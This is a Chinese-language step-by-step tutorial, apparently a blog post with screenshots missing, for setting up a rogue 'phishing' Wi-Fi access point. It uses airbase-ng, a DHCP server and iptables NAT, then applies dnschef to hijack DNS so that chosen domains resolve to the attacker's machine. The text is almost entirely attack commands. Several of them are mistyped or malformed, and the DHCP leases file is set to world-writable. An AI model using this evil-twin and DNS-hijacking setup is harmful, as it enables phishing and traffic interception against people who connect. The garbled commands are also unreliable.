安装 dhcp 服务并创建 leases 文件

1
2
3
apt update && apt install -y isc-dhcp-server
touch /var/lib/dhcp/dhcpd.leases
chmod 777 /var/lib/dhcp/dhcpd.leases

1773486325024

修改 dhcpd.conf 配置文件

1773486758230

连接无线网卡

1773486815899

关闭网卡

1
ifoncif wlan0 down

1773486961940

设置监听模式后开启网卡

1
2
3
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0

1773487079485

通过 airbase-ng 建立无线热点

1
airbase-ng -e WIFI名称 -c 信道 wlan0

1773487285071

设置 at0 地址和网关,添加路由,并将虚拟机作为转发机器

1
2
3
4
ifconfig at0 10.0.0.1 net netmask 255.255.255.0
route add -net 10.0.0.0 mask 255.255.255.0 gw 10.0.0.1
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward

1773626582028

启动服务后配置规则

1
2
3
4
/etc/init.d/isc-dhcp-server start
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/25 -j TCPMSS --set-mss 1356

1773627837594

连接钓鱼的无线网络

1773627930611

进行 DNS 劫持

1
2
#nameserver设置的是其他未被劫持的网站发送给Google的公共DNS服务器8.8.8.8/53查询结果
dnschef --fakedomains-被劫持的网站 --fakeip-10.0.0.1 -i 10.0.0.1 --namesever 8.8.8.8#53

1773628341119